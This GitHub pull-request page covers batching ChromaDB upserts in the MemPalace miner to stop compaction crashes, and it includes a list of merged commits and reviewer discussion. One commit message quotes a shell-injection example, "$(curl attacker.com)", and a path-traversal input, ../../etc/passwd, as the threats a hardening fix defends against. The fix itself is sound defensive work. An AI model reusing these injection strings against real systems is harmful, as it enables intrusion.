
fix: batch upserts in miner to prevent ChromaDB 1.5.x compaction crashes#796

Open
IzmanIzy wants to merge 28 commits into MemPalace:main from IzmanIzy:fix/batch-upsert-chromadb-compaction

Conversation

@IzmanIzy

Summary

  • Batch all chunks per file into a single collection.upsert() call instead of upserting each chunk individually. This reduces WAL write pressure that causes the Rust compactor in ChromaDB >= 1.5 to crash.
  • Add periodic checkpoints (every 200 files) that release and re-acquire the collection, giving the compactor time to flush background work.
  • Release collection reference at the end of mining for a clean shutdown.
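The batching described above can be sketched as follows. This is a minimal illustration assuming a ChromaDB-style collection object; the function name, ID scheme, and metadata fields here are hypothetical, not the miner's actual API:

```python
def upsert_file_chunks(collection, file_path, chunks, embed):
    """Accumulate every chunk of one file, then issue a single upsert.

    One upsert per file means one WAL entry per file instead of one
    per chunk, which is what relieves the compaction pressure.
    """
    ids, documents, embeddings, metadatas = [], [], [], []
    for i, chunk in enumerate(chunks):
        ids.append(f"{file_path}::chunk{i}")
        documents.append(chunk)
        embeddings.append(embed(chunk))
        metadatas.append({"source": file_path, "chunk_index": i})
    collection.upsert(
        ids=ids,
        documents=documents,
        embeddings=embeddings,
        metadatas=metadatas,
    )
```

The key property is that `collection.upsert` is called exactly once per file, regardless of how many chunks the file produces.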

Problem

When mining projects with 100+ files, the miner issues thousands of individual upserts. On ChromaDB 1.5.x this causes:

  1. Segfault (exit code 139) — the Rust compactor corrupts the metadata segment during concurrent individual writes
  2. InternalError: Failed to apply logs to the metadata segment — WAL entries accumulate faster than compaction can process them

Both errors are intermittent and depend on project size, making them hard to reproduce in small test suites but consistent on real-world knowledge bases (300+ files).

Root Cause

ChromaDB's Rust compactor (introduced in 1.5.x) runs in a background thread. Individual upserts create one WAL entry each, and 2000+ entries in rapid succession overwhelm the compactor's ability to merge them atomically. The previous code already had a comment about hnswlib's thread-unsafe updatePoint path causing segfaults on macOS ARM — this is the same class of bug on the compaction side, now affecting all platforms.
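The checkpoint mechanism described above can be sketched like this. All names are illustrative; only the 200-file interval comes from the PR itself:

```python
CHECKPOINT_EVERY = 200  # interval from the PR; constant name is hypothetical

def mine(client, files, process_file):
    """Mine files with periodic checkpoints that release and re-acquire
    the collection, giving the background compactor time to flush."""
    collection = client.get_or_create_collection("drawers")
    for n, path in enumerate(files, start=1):
        process_file(collection, path)
        if n % CHECKPOINT_EVERY == 0:
            collection = None  # drop the reference so buffered WAL entries flush
            collection = client.get_or_create_collection("drawers")
    collection = None  # final release for a clean shutdown
```

On a 401-file mine this re-acquires the collection at files 200 and 400, matching the two checkpoint flushes reported in the Testing section below.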

Testing

  • 37 existing miner tests pass (pytest tests/ -k "mine" — 37 passed, 0 failed)
  • Verified on a real 406-file knowledge base (3026 drawers) with ChromaDB 1.5.7 — zero crashes, clean completion with two checkpoint flushes at file 200 and 400
  • Lint (ruff check) and format (ruff format --check) pass
  • No changes to public API or CLI interface

Test plan

  • ruff check . passes
  • ruff format --check . passes
  • pytest tests/ -v --ignore=tests/benchmarks -k "mine" — 37 passed
  • Manual test: mine 406-file project with ChromaDB 1.5.7 — 3026 drawers, 0 crashes
  • Verify re-mining (modified files) still works correctly
  • Test with ChromaDB 0.6.x to confirm backward compatibility

🤖 Generated with Claude Code

@jphein
Contributor

jphein commented Apr 13, 2026

This addresses the same WAL pressure issue we tackled in #629 — worth noting that PR also adds bulk mtime pre-fetch (bulk_check_mined()) and optional concurrent mining via --workers. The single-file batch approach here is cleaner for a targeted fix though. Might be worth coordinating so the two PRs don't conflict — happy to rebase #629 on top of this if it merges first.


igorls added the area/mining (File and conversation mining) and bug (Something isn't working) labels on Apr 14, 2026
Kesshite and others added 24 commits April 14, 2026 07:54
…etic injection

save_hook.sh:
- Coerce stop_hook_active to strict True/False before eval to prevent
  command injection via crafted JSON (e.g. "$(curl attacker.com)")
- Validate LAST_SAVE as plain integer with regex before bash arithmetic
  to prevent command substitution via poisoned state files

hooks_cli.py:
- Add _validate_transcript_path() that rejects paths with '..'
  components and non-.jsonl/.json extensions
- _count_human_messages() now uses the validator, returning 0 for
  invalid paths instead of opening arbitrary files

Tests:
- Path traversal rejection (../../etc/passwd)
- Wrong extension rejection (.txt, .py)
- Valid path acceptance (.jsonl, .json)
- Empty string handling
- Shell injection in stop_hook_active field

Refs: MemPalace#809
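The validator described in this commit can be sketched as below. This is a simplified version using POSIX path semantics; the real `_validate_transcript_path()` in `hooks_cli.py` may differ in signature and in how it handles platform-native separators:

```python
from pathlib import PurePosixPath

def validate_transcript_path(path: str) -> bool:
    """Reject empty paths, '..' traversal components, and any
    extension other than .jsonl / .json (sketch)."""
    if not path:
        return False
    if ".." in PurePosixPath(path).parts:
        return False
    return path.endswith((".jsonl", ".json"))
```

Callers treat a `False` result as "count zero messages" rather than opening the file, which is what stops the arbitrary-file-read vector.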
…h test

- _count_human_messages() now logs a WARNING via _log() when a
  non-empty transcript_path is rejected by the validator, making
  silent auto-save failures diagnosable via hook.log
- Add test for platform-native paths (backslashes on Windows) to
  verify _validate_transcript_path works cross-platform
- Add test verifying the warning log is emitted on rejection

Refs: MemPalace#809
Noticed a URL:
```
hXXps://www.mempalace[.]tech/
```

Though the README already warns about it, it is probably best to surface that warning prominently at the top of the README.

sanitize_name rejects commas, colons, parentheses, and slashes — characters
that commonly appear in knowledge graph subject/object values. Adds
sanitize_kg_value for KG entity fields (subject, object, entity) while
keeping sanitize_name for predicates and wing/room names.
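The split described above can be sketched as two validators. The patterns here are hypothetical stand-ins; only the intent (strict names for predicates and wing/room names, permissive values for KG subject/object/entity fields) comes from the commit:

```python
import re

# Strict: predicates and wing/room names (pattern is illustrative).
NAME_RE = re.compile(r"^[A-Za-z0-9_\- ]+$")

def sanitize_name(value: str) -> bool:
    """Reject commas, colons, parentheses, slashes, and other punctuation."""
    return bool(NAME_RE.match(value))

def sanitize_kg_value(value: str) -> bool:
    """Permissive: keep punctuation common in KG entity values such as
    'Smith, John (CEO)'; reject only empty strings and control characters."""
    return bool(value) and not any(ord(c) < 32 for c in value)
```

A value like `"Smith, John (CEO)"` fails `sanitize_name` but passes `sanitize_kg_value`, which is the behavior change the commit is after.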
When no mempalace.yaml or mempal.yaml exists in the source directory,
return a default config (wing = directory name, room = general) instead
of calling sys.exit(1). This lets users mine any directory into their
palace without requiring init first.

Closes MemPalace#14.
Addresses review feedback on MemPalace#604:

- Warning now goes to stderr instead of stdout so it doesn't mix with
  mine progress output when users pipe stdout elsewhere.
- Warning explicitly calls out that directories with the same basename
  will share a wing name, and suggests adding mempalace.yaml to
  disambiguate. Prevents silent content mixing across projects mined
  without yaml.
fix: allow mining directories without local mempalace.yaml
…ction

fix: harden hooks against shell injection, path traversal, and arithmetic injection
Replace the blanket ban on .tech/.io/.com domains with an allowlist
of real MemPalace surfaces (GitHub repo, PyPI, mempalaceofficial.com)
and call out mempalace.tech as the reported impostor. The blanket
.com ban would have flagged mempalaceofficial.com as fake once DNS
resolves (CNAME shipped in MemPalace#877).

Also update the April 11 follow-up section to match so the two
notices no longer contradict each other.
…y-increase

Increase visibility of fake website caution
…ze-punctuation

fix: use permissive validator for KG entity values
Move regular expression compilation to the module level in `dialect.py` to prevent repeated parsing during loop execution.

Co-authored-by: igorls <4753812+igorls@users.noreply.github.com>
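The module-level compilation pattern from that commit looks roughly like this. The pattern itself is a placeholder, not the actual regex in `dialect.py`:

```python
import re

# Compiled once at import time instead of on every loop iteration
# (illustrative pattern, not dialect.py's real one).
ENTITY_RE = re.compile(r"\b[A-Z][a-zA-Z0-9_]+\b")

def extract_entities(lines):
    """Scan lines for capitalized tokens using the precompiled pattern."""
    hits = []
    for line in lines:
        hits.extend(ENTITY_RE.findall(line))
    return hits
```

Python caches patterns passed to `re.findall`, but hoisting the compile still avoids a dict lookup per call and makes the hot loop's cost explicit.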
…Palace#871)

export MEMPAL_VERBOSE=true  → hook blocks, agent writes diary in chat
export MEMPAL_VERBOSE=false → silent background save (default)

Developers need to see code and diaries being written.
Regular users want zero chat clutter. Now both work.

TDD: tests written first, failed, code fixed, tests pass.

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
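Reading the flag described above might look like the following. The helper name and the exact parsing rules are assumptions; only the variable name `MEMPAL_VERBOSE` and the true/false semantics come from the commit:

```python
import os

def mempal_verbose() -> bool:
    """Hypothetical helper: only the string 'true' (case-insensitive)
    enables verbose mode; anything else keeps the silent default."""
    return os.environ.get("MEMPAL_VERBOSE", "false").strip().lower() == "true"
```

Treating every value other than `"true"` as off keeps the silent background save as the safe default for regular users.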
Contributors now get a one-click dev environment that mirrors CI exactly:
Python 3.11 (middle of the 3.9/3.11/3.13 matrix), ruff pinned to the same
>=0.4.0,<0.5 range CI enforces, and pre-commit hooks auto-installed from
the existing .pre-commit-config.yaml.

Pinning ruff in post-create.sh is the load-bearing piece: pyproject only
sets a floor, so without the pin the ruff extension would install 0.15.x
and phantom-fail lint against CI's 0.4.x.
…ompilation-15578943484596502942

⚡ Optimize regex compilation in entity extraction
feat: add VSCode devcontainer matching CI environment
Closes MemPalace#872. The top-level decision field only recognizes "block".
To not block, return empty JSON {}. "allow" was silently ignored
by Claude Code, causing unpredictable behavior.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
fix: add missing self._lock to query_relationship, timeline, and stats in KnowledgeGraph
…sion

fix: replace invalid 'decision: allow' with {} in hooks (closes MemPalace#872)
TDD: test first, failed, fixed, passed.

Igor fixed query_relationship/timeline/stats in an earlier commit.
close() was the last method touching self._connection without
holding the lock.

Closes MemPalace#883.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
fix: add lock to KG close() — last missing lock (closes MemPalace#883)
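The locking pattern the two KnowledgeGraph fixes converge on can be sketched as below. The class shape, schema, and method bodies are illustrative; the point is that every method touching `self._connection`, including `close()`, holds `self._lock`:

```python
import sqlite3
import threading

class KnowledgeGraph:
    """Sketch: a shared SQLite connection guarded by a single lock."""

    def __init__(self, path=":memory:"):
        self._lock = threading.Lock()
        self._connection = sqlite3.connect(path, check_same_thread=False)

    def stats(self):
        with self._lock:  # same lock as every other connection-touching method
            cur = self._connection.execute("SELECT 1")
            return cur.fetchone()[0]

    def close(self):
        with self._lock:  # the last missing lock, per MemPalace#883
            self._connection.close()
```

Without the lock in `close()`, a query running on another thread can race the teardown and operate on a half-closed connection.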
The rerank pipeline was hardcoded to Anthropic's /v1/messages.
Add a backend flag so the same code path can be exercised with
any OpenAI-compatible endpoint — local Ollama, Ollama Cloud,
or any gateway that speaks /v1/chat/completions.

Enables independent verification of the "100% with Haiku rerank"
claim by running the full benchmark with a different LLM family
(e.g. minimax-m2.7:cloud) and zero Anthropic dependency.

Both longmemeval_bench.py and locomo_bench.py:
 - llm_rerank*() gain backend= / base_url= kwargs
 - CLI: --llm-backend {anthropic,ollama}, --llm-base-url
 - API key required only when backend=anthropic (diary/palace modes still require it)
 - Parse last integer in response (reasoning models emit multi-int output)
 - Fallback to message.reasoning when content is empty
 - Raise max_tokens to 1024 for reasoning models
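The response-parsing behavior in the last few bullets can be sketched like this. The message-dict shape (`content` / `reasoning` keys) is an assumption based on the description of OpenAI-compatible reasoning-model output:

```python
import re

def parse_rerank_answer(message: dict):
    """Take the last integer in the reply, since reasoning models often
    emit several numbers before the final answer; fall back to the
    'reasoning' field when 'content' is empty (hypothetical shape)."""
    text = message.get("content") or message.get("reasoning") or ""
    matches = re.findall(r"-?\d+", text)
    return int(matches[-1]) if matches else None
```

Returning `None` for a digit-free reply lets the caller decide whether to retry or score the question as a miss.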
igorls added 3 commits April 14, 2026 21:20
Addresses MemPalace#875: every internal BENCHMARKS.md claim reproduced
on Linux x86_64 (v3.3.0 tag, deterministic ChromaDB embeddings,
seed=42 for the LongMemEval dev/held-out split).

Scorecard — all reproduce exactly:

  LongMemEval
    raw R@5                            96.6% (500/500)   ✅
    hybrid_v4 held-out 450 R@5         98.4% (442/450)   ✅
    hybrid_v4 + minimax rerank R@5     99.2% (496/500)   *
    hybrid_v4 + minimax rerank R@10   100.0% (500/500)   *

  LoCoMo (session, top-10)
    raw                                60.3% (1986q)     ✅
    hybrid v5                          88.9% (1986q)     ✅

  ConvoMem all-categories (250 items)   92.9%            ✅
  MemBench all-categories (8500)        80.3%            ✅

* The minimax-m2.7:cloud rerank run replicates the "100%" claim
  with a different LLM family (no Anthropic dependency). R@10 is
  a perfect reproduction; R@5 misses 4 questions that the
  published Haiku run caught — consistent with BENCHMARKS.md's own
  disclosure that hybrid_v4 includes three question-specific fixes
  developed by inspecting misses, i.e. teaching to the test.

The committed 50/450 split is the deterministic (seed=42) split
BENCHMARKS.md references but wasn't previously in the repo.

Full result JSONLs include every question, every retrieved id,
and every score — auditable end-to-end.
…tion

benchmarks: v3.3.0 reproduction results + Ollama rerank backend
Adapts the approach from @IzmanIzy's PR MemPalace#796 to current develop, which
diverged after that PR was opened — ``add_drawer`` now populates
additional metadata fields (``normalize_version``, ``hall``, ``entities``,
``source_mtime``) that a verbatim rebase of MemPalace#796 would have regressed.

Changes:

- Extract ``_build_drawer_payload()`` helper — single source of truth for
  drawer ID + metadata construction, shared by ``add_drawer`` (single
  drawer, kept as a thin wrapper for backwards compat with tests) and
  ``process_file`` (batched per-file path).
- ``process_file`` now accumulates all chunks from one file into batch
  lists and issues a single ``collection.upsert()`` call with them all,
  instead of one upsert per chunk. Preserves every metadata field
  ``add_drawer`` sets, including the ones added after MemPalace#796 was opened.
- ``mine()`` adds a periodic checkpoint every 200 files that releases and
  re-acquires the collection (and closets collection), letting the Rust
  compactor flush buffered WAL entries between batches.
- ``mine()`` releases both collection references at the end of mining
  so the final WAL entries flush cleanly before the process exits.

## Problem

A typical project mine issues thousands of individual ``col.upsert()``
calls. ChromaDB 1.5.x's Rust compactor runs concurrently with writes
and falls behind under this pattern, surfacing as:

- ``Segfault (exit 139)`` — the compactor corrupts the metadata segment
  during concurrent individual writes
- ``chromadb.errors.InternalError: Error in compaction: Failed to apply
  logs to the metadata segment``
- Later reads crash with ``mismatched types; Rust type u64 (as SQL type
  INTEGER) is not compatible with SQL type BLOB`` — the compactor left
  half-migrated rows with ``seq_id`` values still stored as BLOB instead
  of decoded to INTEGER

## Scope

``tests/test_miner.py::test_add_drawer`` and
``tests/test_hall_detection.py::test_add_drawer_includes_hall`` both call
``miner.add_drawer()`` directly and expect ``True`` + a single drawer
with full metadata. Both pass with the backwards-compat wrapper.

Related: MemPalace#796 (original PR, now has develop conflicts), MemPalace#899 (MCP
server library staleness — the other vector that creates compaction
crashes upstream of this fix).

Co-Authored-By: IzmanIzy <noreply@github.com>
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
@messelink

messelink commented Apr 15, 2026

Hi @IzmanIzy — I hit the exact compaction crash this PR fixes while mining into an existing palace that had accumulated BLOB-typed seq_id rows from a stale long-running MCP server (see #899 for that adjacent bug). The batching approach here solved my immediate problem, so thank you for writing it up.

I wanted to flag that this PR has a non-trivial rebase conflict against current develop: since it was opened, add_drawer() on develop has grown three new metadata fields that your PR's inlined version in process_file() doesn't reproduce — a verbatim cherry-pick would silently regress them. Specifically:

  • normalize_version (from palace.NORMALIZE_VERSION)
  • hall (from detect_hall(content))
  • entities (from _extract_entities_for_metadata(content))

The source_mtime try/except is also now in the common path.

I rebased your approach onto current develop and adapted it to preserve those fields. Rather than inlining metadata construction in process_file(), I extracted a _build_drawer_payload() helper and kept add_drawer() as a thin single-drawer wrapper (for backwards compat with the tests/test_miner.py::test_add_drawer and tests/test_hall_detection.py::test_add_drawer_includes_hall tests, which call add_drawer directly and check for normalize_version / hall in the stored metadata). The batched per-file upsert and the periodic checkpoint logic are kept as you wrote them.
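The helper-plus-wrapper structure described above can be sketched as follows. Field shapes here are hypothetical; the real `_build_drawer_payload()` also fills `normalize_version`, `hall`, `entities`, and `source_mtime`, which this sketch omits:

```python
def build_drawer_payload(content, source, index):
    """Single source of truth for drawer ID + metadata construction."""
    return {
        "id": f"{source}::{index}",
        "document": content,
        "metadata": {"source": source, "chunk_index": index},
    }

def add_drawer(collection, content, source, index=0):
    """Thin single-drawer wrapper, kept for backwards compat with tests."""
    payload = build_drawer_payload(content, source, index)
    collection.upsert(
        ids=[payload["id"]],
        documents=[payload["document"]],
        metadatas=[payload["metadata"]],
    )
    return True

def process_file(collection, source, chunks):
    """Batched per-file path: one upsert for all of a file's chunks."""
    payloads = [build_drawer_payload(c, source, i) for i, c in enumerate(chunks)]
    collection.upsert(
        ids=[p["id"] for p in payloads],
        documents=[p["document"] for p in payloads],
        metadatas=[p["metadata"] for p in payloads],
    )
```

Because both paths go through the same payload builder, a metadata field added later lands in the single-drawer and batched paths at once instead of silently diverging.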

Commit: messelink/mempalace@9cc1365
Branch: messelink:fix/batch-upsert-chromadb-compaction (clean off current upstream/develop)

Test I ran

A delete-and-remine of a 20-file subtree (mix of markdown docs and chat transcripts) into an existing ~14.8k-drawer palace. Result: 1,324 drawers filed in a single end-to-end run without any compaction errors. The largest single-file batch was 618 drawers in one collection.upsert() call — exactly the stress case your PR targets. Search against the re-mined content works correctly afterward.

Previously (without the batching), the same mine crashed with Error in compaction: Error reading from metadata segment reader: error occurred while decoding column 0: mismatched types; Rust type u64 (as SQL type INTEGER) is not compatible with SQL type BLOB on the first upsert, and I lost a chunk of drawers to silent file-already-mined skipping on retry.

How to proceed

Totally your call — I don't want to step on your PR. Three options:

  1. You fetch my branch and apply it to yours: git fetch https://github.com/messelink/mempalace.git fix/batch-upsert-chromadb-compaction && git reset --hard FETCH_HEAD on your local fix/batch-upsert-chromadb-compaction, then force-push. Cleanest attribution (your PR, just rebased). The commit already credits you as Co-Authored-By.
  2. You enable "Allow edits from maintainers" on this PR. I can't push to it directly myself (I'm not a maintainer of milla-jovovich/mempalace), but one of the maintainers could then push my patch to your branch.
  3. If you're unavailable or prefer, I'm happy to open a separate PR that supersedes this one, credits you, and links back here.

Let me know which you prefer. Happy to wait a few days for a reply before doing option 3.

cc @milla-jovovich for awareness — this PR becomes unblocked with the rebase.

@bensig
Collaborator

bensig commented Apr 15, 2026

hey @IzmanIzy — this conflicts with develop now. pls rebase and we can merge. thanks!

@bensig
Collaborator

bensig commented Apr 15, 2026

@IzmanIzy pls check conflict

@messelink

@bensig — just flagging that my comment above (03:26 UTC) has the rebased version ready if it helps move this along. Branch: messelink:fix/batch-upsert-chromadb-compaction, clean off current develop. Up to @IzmanIzy whether they want to pull it into their branch or I open a new PR.

@IzmanIzy IzmanIzy force-pushed the fix/batch-upsert-chromadb-compaction branch from f15bffd to 9cc1365 Compare April 15, 2026 14:11
@IzmanIzy IzmanIzy requested a review from igorls as a code owner April 15, 2026 14:11
@IzmanIzy
Author

Rebased onto current develop using @messelink's cleaned-up version (thanks! 🙏). Conflict resolved, ready to merge.

@bensig good to go.

